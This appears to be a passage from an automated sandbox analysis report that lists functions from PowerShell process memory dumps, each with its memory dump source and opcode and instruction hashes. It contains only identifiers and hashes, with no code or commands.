                                                                          • Opcode Fuzzy Hash: ff2e7ab668352119eb7f475f04483b3a84d4c25975c8012dabc4511c3410aa40
                                                                          • Instruction Fuzzy Hash: 5A315972B0D68A8FEB65E6A894A15B8B7D2EF46224F5800BFC14DC7193D91CA805C380
                                                                          Function 00007FFD3469A49C Relevance: .1, Instructions: 100COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2304446895.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ffd34690000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5a7a2c5d353019ea7db76a25594b7c855e165c1edf01b18c9209273054d3c40c
                                                                          • Instruction ID: 912a97e0b3100729a22daa92924f2879de72920728f151e7456a09323ed7ed90
                                                                          • Opcode Fuzzy Hash: 5a7a2c5d353019ea7db76a25594b7c855e165c1edf01b18c9209273054d3c40c
                                                                          • Instruction Fuzzy Hash: BF21F63190C74C4FEB59DF9C984A7E97BE0EBA6321F00426BD049C3162DA74A81ACB91
                                                                          Function 00007FFD347640BF Relevance: .1, Instructions: 98COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2305129420.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ffd34760000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ef883c03ff21e88cebd762143150016aa5f9cb5abf5218777d9eef1d71fcf2ff
                                                                          • Instruction ID: a35eac5f5cdb907554dad549f5bfee655521a57ac2e178aa54f0e1c4c8eaadb1
                                                                          • Opcode Fuzzy Hash: ef883c03ff21e88cebd762143150016aa5f9cb5abf5218777d9eef1d71fcf2ff
                                                                          • Instruction Fuzzy Hash: 272105A3B0DA9A8FE7A9DA1844E017436D3EF66230B5900BAD24DC71D3DD2CFC049789
                                                                          Function 00007FFD347643BC Relevance: .1, Instructions: 63COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2305129420.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ffd34760000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4d6b8d02a527d6b205c8137a8bc0f3e05af9bc6b9d37ec37ae293471712f7e71
                                                                          • Instruction ID: fad621cf3a390200784aeb8b0c9625ea0186af50b3e3c5be714991194d39c5df
                                                                          • Opcode Fuzzy Hash: 4d6b8d02a527d6b205c8137a8bc0f3e05af9bc6b9d37ec37ae293471712f7e71
                                                                          • Instruction Fuzzy Hash: F51136B2B0E6458FE7A0D71C84E51B47BD2EF4623474800BAD55DD7093D91CBC0093C4
                                                                          Function 00007FFD3476681A Relevance: .1, Instructions: 60COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2305129420.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ffd34760000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 95a67d83150f7098726ddfc71a6c2b11fbaa4e40bdfada8940273322c392849a
                                                                          • Instruction ID: 787128dbd6d0e62668915d1ffbcf4b1e0f68b232771db566e3780754cba5016c
                                                                          • Opcode Fuzzy Hash: 95a67d83150f7098726ddfc71a6c2b11fbaa4e40bdfada8940273322c392849a
                                                                          • Instruction Fuzzy Hash: 6D112972F0D68A8FEBA5DAA880E517877D2EF59324F9400BEC14DD7193C92DA805C380
                                                                          Function 00007FFD3457EC1C Relevance: .1, Instructions: 56COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2303386386.00007FFD3457D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3457D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ffd3457d000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: aeac522f2ef80d12d1361f1d0d31b57fb9d9784b95802a8a11a149c8e4439d19
                                                                          • Instruction ID: 3fcd16e3738173ecb9112b0c7023e421d249f1c2fd4a6a8defa41681fbd57c01
                                                                          • Opcode Fuzzy Hash: aeac522f2ef80d12d1361f1d0d31b57fb9d9784b95802a8a11a149c8e4439d19
                                                                          • Instruction Fuzzy Hash: 3F012C3160CE088F9BA9EF2DE4859523BE0FB98320710469BD459C755AD635F892CBC1
                                                                          Function 00007FFD346933B5 Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2304446895.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ffd34690000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                          • Instruction ID: 66e339b9c219ae05c0f4a9cc314582de7c043b64f66fa0b2c63f0f34819a108e
                                                                          • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                          • Instruction Fuzzy Hash: 5F01677125CB0C4FDB44EF0CE451AA5B7E0FB99364F10056DE58AC3651DA36E892CB45
                                                                          Function 00007FFD3469A0FB Relevance: .0, Instructions: 44COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2304446895.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ffd34690000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5cd32253365a725370fc84fb76aba6152922ca61b8038a7b9afe110ca58d100d
                                                                          • Instruction ID: 7a26bed1b32fed5f2ec910f2d71c3ef6666de8cd1bbf3e3996ee4cd1c45bb60f
                                                                          • Opcode Fuzzy Hash: 5cd32253365a725370fc84fb76aba6152922ca61b8038a7b9afe110ca58d100d
                                                                          • Instruction Fuzzy Hash: 53F0F67694DACC4FDB41EF2CACA50E97BE0FF67314B0502A7D648C7061DB299819D782

                                                                          Non-executed Functions

                                                                          Function 00007FFD34698BD3 Relevance: 7.6, Strings: 6, Instructions: 146COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2304446895.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ffd34690000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: K_^4$K_^5$K_^@$K_^N$K_^U$K_^Y
                                                                          • API String ID: 0-4293504607
                                                                          • Opcode ID: 16609c71894029b894e31eb0b6bb0f1b244423be56d9ce1e11d0e6353f0d3301
                                                                          • Instruction ID: d41f5b9bc2cb1217c7d51c504e460ecb8eb2cd953f52806858dfee43e6095244
                                                                          • Opcode Fuzzy Hash: 16609c71894029b894e31eb0b6bb0f1b244423be56d9ce1e11d0e6353f0d3301
                                                                          • Instruction Fuzzy Hash: C431F5B7B0C62A1ED6117AFCB8911EA6794DFE427A74547B7D288DB043CD18608B8A80

                                                                          Executed Functions

                                                                          Function 00007FFD34753CA8 Relevance: 1.2, Instructions: 1211COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2441266702.00007FFD34750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd34750000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1b96a7bc8e8d180ba9cf2a2887bc2c8170a20b2b4ebf8f6bb9b5b6843871186b
                                                                          • Instruction ID: a6d28a966314755c317f56e374225d9b1a5ebd70d52d3de05474d5dcf7a4c43b
                                                                          • Opcode Fuzzy Hash: 1b96a7bc8e8d180ba9cf2a2887bc2c8170a20b2b4ebf8f6bb9b5b6843871186b
                                                                          • Instruction Fuzzy Hash: 22721962A0DBC95FE766972858A52A43BE1EF57210B0901FBD18DCB1A3DD1CBC07D391
                                                                          Function 00007FFD34686435 Relevance: .7, Instructions: 732COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2440355072.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd34680000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 61c758adb60d4a5df91feb04fa8eeaa90770c4cabc7cfc590297a070ffeda33f
                                                                          • Instruction ID: 764501a67d11ed0860ae91f4959a25dbeba5e7ac276b2fd5755305ac5949f7d5
                                                                          • Opcode Fuzzy Hash: 61c758adb60d4a5df91feb04fa8eeaa90770c4cabc7cfc590297a070ffeda33f
                                                                          • Instruction Fuzzy Hash: 0ED15D31A08A5E8FDF94DF58C4A5AE97BF1FF69304F14416AD40DD7296CA38E881CB81
                                                                          Function 00007FFD34689738 Relevance: .2, Instructions: 155COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2440355072.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd34680000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4da8b45e9bde278870347714e968cf7a504ed5116c1d18f39156fe62a6d1d6b3
                                                                          • Instruction ID: f465358208d991e1aba001b3e19d615a27b106a6a56b8bf0f4f6715c7ddee503
                                                                          • Opcode Fuzzy Hash: 4da8b45e9bde278870347714e968cf7a504ed5116c1d18f39156fe62a6d1d6b3
                                                                          • Instruction Fuzzy Hash: 29413A72A0CA885FDB589F1C9C566F8BBE1FB55310F04412FE549D3283DA24E815CBC2
                                                                          Function 00007FFD3456ED40 Relevance: .1, Instructions: 126COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2439405846.00007FFD3456D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3456D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd3456d000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ba8d5fe947ba862150cc1931a03eb569cf2c30c95053434463429f8e99a38f81
                                                                          • Instruction ID: a4e34f1c27542ba196f92ec6f6010c1e130e7ceaee0133c25b2605abd252cb2e
                                                                          • Opcode Fuzzy Hash: ba8d5fe947ba862150cc1931a03eb569cf2c30c95053434463429f8e99a38f81
                                                                          • Instruction Fuzzy Hash: A841F37180EBC45FE7579B2898959523FF0EF57220B1906DFD088CB1A3D629A846C7A2
                                                                          Function 00007FFD3468A64C Relevance: .1, Instructions: 99COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2440355072.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd34680000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 40d2a7945c92950ae5a391e18145864f41dcb3fab868b436e4ee40723a3b2f02
                                                                          • Instruction ID: 701a157e126cc5f102508d5453de1479d8c0b0462a9c522b157c9d492247cecf
                                                                          • Opcode Fuzzy Hash: 40d2a7945c92950ae5a391e18145864f41dcb3fab868b436e4ee40723a3b2f02
                                                                          • Instruction Fuzzy Hash: F3212831A0CB4C8FDB59DFAC9C4A7E97FE0EB96320F04416BD448C3152DA74945ACB92
                                                                          Function 00007FFD347540BF Relevance: .1, Instructions: 98COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2441266702.00007FFD34750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd34750000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0058fba77945e3f6603281fc734365074f0c4e594efb96c9d1a41128801cb14b
                                                                          • Instruction ID: f1f56e65c7f73f8459ed21fc540df6ac93c05e627bcbb5de0d2f1ca0965ff57e
                                                                          • Opcode Fuzzy Hash: 0058fba77945e3f6603281fc734365074f0c4e594efb96c9d1a41128801cb14b
                                                                          • Instruction Fuzzy Hash: 2A21E8B3B0DA568FE7A5EB1944E127476D2EF66210B5900FAD24DCB1D2DD1CFC069381
                                                                          Function 00007FFD347543BC Relevance: .1, Instructions: 63COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2441266702.00007FFD34750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd34750000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 06ed9aebeceb3a0ccb4938c9b4885332fcd220e5aac5cfc10b95a417f871e495
                                                                          • Instruction ID: 0a198d45692b6c4e84adb575c0c6507b8420360dcd4d26ec05770dfafd078e16
                                                                          • Opcode Fuzzy Hash: 06ed9aebeceb3a0ccb4938c9b4885332fcd220e5aac5cfc10b95a417f871e495
                                                                          • Instruction Fuzzy Hash: 4C1136B2F0E6498FE7A4DB1884E46B877E0EF4622474800FAD15DCB0A3D91CBC1293C0
                                                                          Function 00007FFD3475681E Relevance: .1, Instructions: 60COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2441266702.00007FFD34750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd34750000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: eacc5d59bcd1f4314ec96776f93ed83a5859e75d342e10bc00b2a1535c23c596
                                                                          • Instruction ID: b200309a5081f98b6c52e4dd35fe4e36116ac1a186ebc5d0f21993f2a6adb5c4
                                                                          • Opcode Fuzzy Hash: eacc5d59bcd1f4314ec96776f93ed83a5859e75d342e10bc00b2a1535c23c596
                                                                          • Instruction Fuzzy Hash: 68112772F0D6888FE765DA9844E556877D1EF1A314B1840FEC14CCB193D928B806C391
                                                                          Function 00007FFD346833B5 Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2440355072.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd34680000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                          • Instruction ID: 99ccd9aa28ab21da87489c59e0d9d7a1036f9ae1a88a610e4ac9eb2b15120870
                                                                          • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                          • Instruction Fuzzy Hash: 2701677121CB0C4FD744EF0CE451AA5B7E0FB95364F10056DE58AC3651DA36E892CB45
                                                                          Function 00007FFD3468A2C9 Relevance: .0, Instructions: 24COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2440355072.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd34680000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 61401ea24719c3810c0cb162c28e8521e29beb4a1327bb23a7fc19ac4324c815
                                                                          • Instruction ID: d86af1fd9888a11fe91850efc29159b7576a2f8410dd15233a0ae0190b5f8c06
                                                                          • Opcode Fuzzy Hash: 61401ea24719c3810c0cb162c28e8521e29beb4a1327bb23a7fc19ac4324c815
                                                                          • Instruction Fuzzy Hash: EDE0E575908A4C8F9B55EF1898594E97BA0FB69301B04469AE809C6120DB719958CBC2

                                                                          Non-executed Functions

                                                                          Function 00007FFD34688BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2440355072.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd34680000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: L_^4$L_^7$L_^F$L_^J
                                                                          • API String ID: 0-3225005683
                                                                          • Opcode ID: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
                                                                          • Instruction ID: 3f7ac82a682a578a4f261a0f346ec01a207f207bf7c156ecb7e514b89dd2c68f
                                                                          • Opcode Fuzzy Hash: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
                                                                          • Instruction Fuzzy Hash: DD21D1B77086255ED2127BFDB8155EF3744CFE427934552B2D2989B053EE14608A8EE0

                                                                          Executed Functions

                                                                          Function 00007FFD34669770 Relevance: .1, Instructions: 133COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2654782385.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd34660000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 65705ba84e6ba40c779da73c47177a8b33102b3a061cb198f5187f160382627a
                                                                          • Instruction ID: da2ad63b6792345bf230e632d25f6b9e0233dedf5d07e260886e29f263c7542f
                                                                          • Opcode Fuzzy Hash: 65705ba84e6ba40c779da73c47177a8b33102b3a061cb198f5187f160382627a
                                                                          • Instruction Fuzzy Hash: 8F311B3190CB484FDB189F5C9C4A6E9BBE0FBA9310F04416FE449D3252DA74A815CBC2
                                                                          Function 00007FFD3454EE20 Relevance: .1, Instructions: 129COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2653407700.00007FFD3454D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3454D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd3454d000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0c2486400f453fd80e0b20733a71fe865d8540b106ddc9f273d944cac12665dd
                                                                          • Instruction ID: 7aadf9f1fde13961a6ea5dc0f87e1908d1da661cadca943d1530bc82e5342fb6
                                                                          • Opcode Fuzzy Hash: 0c2486400f453fd80e0b20733a71fe865d8540b106ddc9f273d944cac12665dd
                                                                          • Instruction Fuzzy Hash: C241F57180DBC45FE7579B3998559623FF0EF53320B1505EFD088CB1A3D629A846C7A2
                                                                          Function 00007FFD3466A49C Relevance: .1, Instructions: 100COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2654782385.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd34660000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6a1066cb1ffd346408f818241e9272d54cc4932827990682fe804b8691b47daa
                                                                          • Instruction ID: d4a699b5c54e13cd463463a1bb2c708214e5693c8cab8088b912bd93f0e36b36
                                                                          • Opcode Fuzzy Hash: 6a1066cb1ffd346408f818241e9272d54cc4932827990682fe804b8691b47daa
                                                                          • Instruction Fuzzy Hash: 2A21F630A0C74C4FEB59DFAC9C8A7E97BF0EB96321F04416BD049C3156DA74A81ACB91
                                                                          Function 00007FFD3473681E Relevance: .1, Instructions: 60COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2656198468.00007FFD34730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd34730000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 943147663f47a334521948211bee97546f5c0817a891e459c907f91b0ebaba83
                                                                          • Instruction ID: 50bfd79ec59efc5a111ed1e3617f555d399be25853106c8c70f801cd5ff54e8c
                                                                          • Opcode Fuzzy Hash: 943147663f47a334521948211bee97546f5c0817a891e459c907f91b0ebaba83
                                                                          • Instruction Fuzzy Hash: F1113AB2F0D6888FE7B5DA9844F55A877D1EF1A310F2440BFC24CC7193DA29A805C391
                                                                          Function 00007FFD346633B5 Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2654782385.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd34660000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                          • Instruction ID: a87958a79b51de30136d2a5796adff37845468f6d091c294b1e8deaa73d43299
                                                                          • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                          • Instruction Fuzzy Hash: 9501677121CB0C4FD744EF0CE451AA5B7E0FB95364F10056DE58AC3651DA36E892CB45
                                                                          Function 00007FFD3466A0FB Relevance: .0, Instructions: 39COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2654782385.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd34660000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 64f340e5fa5a1f1ad3c053fabd04c1bfe01fe215ec25b7e0373f273111fd571e
                                                                          • Instruction ID: 908eb0566a3b4871c85d853432bc94b37bcc6dd0ba1e09a031baa78ec0c24562
                                                                          • Opcode Fuzzy Hash: 64f340e5fa5a1f1ad3c053fabd04c1bfe01fe215ec25b7e0373f273111fd571e
                                                                          • Instruction Fuzzy Hash: 7CF02B7AA08A9D4FCB41DF2C9C641E4BFA0FF76211B0501EBD648C7121D7649814CBC1
                                                                          Function 00007FFD3473414D Relevance: .0, Instructions: 37COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2656198468.00007FFD34730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd34730000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7377ea72c7578ff46cf1081222fd25707dc23d9fa9446560a378df6fd1b6b514
                                                                          • Instruction ID: 436ffcf20d03ff0946f0cbe7ed23e8b41bbe6385fb04ff799762f97e0843a159
                                                                          • Opcode Fuzzy Hash: 7377ea72c7578ff46cf1081222fd25707dc23d9fa9446560a378df6fd1b6b514
                                                                          • Instruction Fuzzy Hash: F8F0BE72B0C9048FE769EA4CE4A18A873E0EF56320B2140BAE25DC7163DA29FC41C7C1
                                                                          Function 00007FFD34734400 Relevance: .0, Instructions: 35COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2656198468.00007FFD34730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd34730000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1c537f85f89941f81ad1a137231bb707e2a9a174690990940100918fb6c4b00e
                                                                          • Instruction ID: 4cd8cb26284fda7c08a3518ab971f493df311dad618de45f940c39569d9c6dd2
                                                                          • Opcode Fuzzy Hash: 1c537f85f89941f81ad1a137231bb707e2a9a174690990940100918fb6c4b00e
                                                                          • Instruction Fuzzy Hash: A6F0BE72A0C5448FE758EA4CE4A58A877E0EF06324B2100B6E25DC7063DA2AFC50C7C1
                                                                          Function 00007FFD347341D1 Relevance: .0, Instructions: 29COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2656198468.00007FFD34730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd34730000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                          • Instruction ID: f8c6eb0e5f6b27e79384bdb8c578577e24f7652380f5b8b3b074d2831f300ad7
                                                                          • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                          • Instruction Fuzzy Hash: 24E01A31B0C818DFDAA8DA0CE0A09A973E1EB9932172101B7D24EC7561CA26FC519BC0

                                                                          Non-executed Functions

                                                                          Function 00007FFD34668BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2654782385.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd34660000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: N_^8$N_^<$N_^?$N_^J$N_^K$N_^N$N_^Q$N_^Y
                                                                          • API String ID: 0-2388461625
                                                                          • Opcode ID: 0a17b3c452628a29204579af913d24a375679f0f8c5c8a70c7dd2c4491a07189
                                                                          • Instruction ID: 3569d94cc581b9e8d0cd901ce20fbfa7fb27dec4cb956bb45ac74a74776a635a
                                                                          • Opcode Fuzzy Hash: 0a17b3c452628a29204579af913d24a375679f0f8c5c8a70c7dd2c4491a07189
                                                                          • Instruction Fuzzy Hash: 2721D7B3B486254AC31137FCBC615EA6B85DFA437934501F3E258DF553DD18648B8A82